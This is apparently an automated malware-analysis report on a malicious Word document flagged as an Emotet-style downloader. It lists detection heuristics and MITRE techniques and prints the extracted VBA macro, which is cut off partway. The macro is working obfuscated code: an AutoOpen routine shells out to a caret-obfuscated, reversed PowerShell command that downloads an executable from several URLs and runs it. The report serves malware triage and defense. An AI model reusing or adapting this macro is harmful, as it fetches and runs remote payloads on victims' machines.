MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for malicious documents. The macro is designed to execute a command using Shell, likely to download and run a second-stage payload. ClamAV detection confirms this behavior, identifying it as 'Doc.Downloader.Emooodldr-6691366-0'.
Heuristics 6
-
ClamAV: Doc.Downloader.Emooodldr-6691366-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emooodldr-6691366-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4454 bytes |
SHA-256: 9f40f9c3b8573ed4e17b2ee926b23a4ab5b26b1c1d1e410cad9aa4b1de364e6c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uJvbzmAijCNd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const BvpVbW = 0
Dim Iwsuuh(5)
Iwsuuh(0) = Right(hoRtd, 449)
Iwsuuh(1) = MidB(FbLmkNcb, 80, 934)
Iwsuuh(2) = Left(ZPmZP, 876)
Iwsuuh(3) = Mid(zSdDPF, 539, 770)
Iwsuuh(4) = MidB(FbLmkNcb, 80, 934)
Dim qnXvt(5)
qnXvt(0) = Left(ZPmZP, 876)
qnXvt(1) = Right(hoRtd, 449)
qnXvt(2) = Left(ZPmZP, 876)
qnXvt(3) = Mid(zSdDPF, 539, 770)
qnXvt(4) = MidB(FbLmkNcb, 80, 934)
Dim oupmi(4)
oupmi(0) = Mid(zSdDPF, 539, 770)
oupmi(1) = MidB(FbLmkNcb, 80, 934)
oupmi(2) = MidB(FbLmkNcb, 80, 934)
oupmi(3) = Left(ZPmZP, 876)
Dim pQFcwq(3)
pQFcwq(0) = Right(hoRtd, 449)
pQFcwq(1) = Mid(zSdDPF, 539, 770)
pQFcwq(2) = Left(ZPmZP, 876)
Shell@ PUNmmAwjwIq + lnVqQCV + IMjZhnEcURwRlq, CInt(BvpVbW)
Dim CdoFJ(4)
CdoFJ(0) = Right(hoRtd, 449)
CdoFJ(1) = Left(ZPmZP, 876)
CdoFJ(2) = MidB(FbLmkNcb, 80, 934)
CdoFJ(3) = Left(ZPmZP, 876)
Dim RizlbE(4)
RizlbE(0) = Left(ZPmZP, 876)
RizlbE(1) = Left(ZPmZP, 876)
RizlbE(2) = Mid(zSdDPF, 539, 770)
RizlbE(3) = MidB(FbLmkNcb, 80, 934)
Dim KrEwMi(5)
KrEwMi(0) = MidB(FbLmkNcb, 80, 934)
KrEwMi(1) = MidB(FbLmkNcb, 80, 934)
KrEwMi(2) = Left(ZPmZP, 876)
KrEwMi(3) = Right(hoRtd, 449)
KrEwMi(4) = Left(ZPmZP, 876)
End Sub
Attribute VB_Name = "RXUVFhlzzAfO"
Function PUNmmAwjwIq()
Dim AziOjB(4)
AziOjB(0) = Left(ZPmZP, 876)
AziOjB(1) = Left(ZPmZP, 876)
AziOjB(2) = Mid(zSdDPF, 539, 770)
AziOjB(3) = Mid(zSdDPF, 539, 770)
YlSPwpkRjS = Format(Chr(9 + 12 + 8 + 15 + 55)) + "md /V^:O/" + Format(Chr(6 + 8 + 5 + 10 + 38)) + Format(Chr(3 + 4 + 2 + 4 + 21)) + "^se^t ^7E=^ ^ ^ ^ ^ ^ " + "^ ^ ^ ^ }^}{h" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "^t" + "^a" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "^};kaerb;^Y" + "^O^z^$ m^et" + "I-^ek^ovn^I^;)YOz^$^ ,A" + "R^H^$(e^liF^d^a^o^ln^woD.rRl${" + "yr^t^{)^uS^m$ ni ^" + "ARH$(^h" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "aer^of;'e^xe.^'^+" + "l^G^f$^+'\^'+" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "ilb"
Dim wbVasR(2)
wbVasR(0) = Right(hoRtd, 449)
wbVasR(1) = MidB(FbLmkNcb, 80, 934)
Dim flHDcp(2)
flHDcp(0) = MidB(FbLmkNcb, 80, 934)
flHDcp(1) = Right(hoRtd, 449)
ruGzVntiosF = "up^:vn^" + "e$=YO^z$;'8^01' ^=^ l^G" + "^f^$^;)^'@^'(^t^il^pS^.^'42V" + "Ina^6/^m^o" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "." + "^gnik^di^ar//:^p^t" + "th^@V^" + "Z^mY9^HE^Uga/^m^o" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "." + "h" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "et^-sni^m" + "//^:^p^t" + "th^@p^3^ZMR" + "n^T^u^I/m^o" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "^.pih^sren" + "tr^ap^s" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "a/" + "/:^pt^t"
Dim bIEcYc(4)
bIEcYc(0) = Mid(zSdDPF, 539, 770)
bIEcYc(1) = Right(hoRtd, 449)
bIEcYc(2) = Right(hoRtd, 449)
bIEcYc(3) = Right(hoRtd, 449)
FzfiT = "^h@O^0^" + "J^z^FSmv/^mo" + Format(Chr(9 + 12 + 8 + 15 + 55)) + ".d^eti^m" + "il^skoobm^urt" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "e^ps//^:pt^th" + "^@^m^8^OJ^KRX/m^" + "o" + Format(Chr(9 + 12 + 8 + 15 + 55)) + ".b^a^" + "lna^ipsa" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "//^:^p^t^t^h^'" + "=u^Sm^$" + ";tne^i^l"
Dim ajFkUs(3)
ajFkUs(0) = Right(hoRtd, 449)
ajFkUs(1) = Left(ZPmZP, 876)
ajFkUs(2) = Right(hoRtd, 449)
Dim LwtMjw(4)
LwtMjw(0) = MidB(FbLmkNcb, 80, 934)
LwtMjw(1) = Right(hoRtd, 449)
LwtMjw(2) = Mid(zSdDPF, 539, 770)
LwtMjw(3) = Right(hoRtd, 449)
vlpsEiDhU = Format(Chr(6 + 8 + 5 + 10 + 38)) + "^b^eW.teN^ t" + Format(Chr(9 + 12 + 8 + 15 + 55)) + "ej" + "^b^o-w^en=rR^l" + "$^ l^l^eh^sre^wo^p&&f^or /^L %" + "^y ^in (37^6^;^-^1^;^0)" + "^do s^et ^g0^3N=!^g" + "0^3N!!^7E:" + "~%^y,1!&&i^f %^y=^=^0" + " " + Format(Chr(9 + 12 + 8 + 15 + 55)) + "a^l^l " + "%^g0^3N:" + "^~-3^77%" + Format(Chr(3 + 4 + 2 + 4 + 21))
PUNmmAwjwIq = YlSPwpkRjS + ruGzVntiosF + FzfiT + vlpsEiDhU
Dim PDkiL(2)
PDkiL(0) = Mid(zSdDPF, 539, 770)
PDkiL(1) = Right(hoRtd, 449)
Dim pDjHYS(4)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.